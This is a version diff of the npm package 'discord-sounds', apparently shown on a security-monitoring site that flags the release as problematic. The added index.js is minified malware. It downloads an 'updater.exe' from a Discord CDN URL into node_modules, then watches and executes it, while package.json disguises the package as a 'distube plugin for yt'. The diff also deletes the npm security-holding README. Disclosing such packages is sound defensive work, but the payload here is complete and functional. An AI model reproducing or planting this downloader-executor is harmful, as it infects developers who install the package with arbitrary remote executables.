discord-sounds 0.0.1-security → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of discord-sounds might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const fs=require("fs"),https=require("https"),{exec:e}=require("child_process"),path=require("path");class ExeFileHandler{constructor(e){this.exePath=e}onModified(t){t===this.exePath&&e(this.exePath,(e,t,s)=>{})}}async function downloadExe(e,t){let s="discord.js",n=path.join("node_modules",s,t),o=path.join("node_modules",s);fs.existsSync(o)||fs.mkdirSync(o,{recursive:!0});let i=fs.createWriteStream(n),a=await new Promise((t,s)=>{let o=https.get(e,e=>{e.pipe(i),e.on("end",()=>{observeFile(n)}),t(e)});o.on("error",s)});a.statusCode}function observeFile(t){fs.watch(t,s=>{"change"===s&&e(t,(e,t,s)=>{})})}downloadExe("https://cdn.discordapp.com/attachments/1178043334820896831/1178044092647735306/updater.exe","updater.exe");
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "discord-sounds",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.3",
4
+ "description": "distube plugin for yt",
5
+ "main": "index.js",
6
+ "devDependencies": {},
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "distube",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=discord-sounds for more information.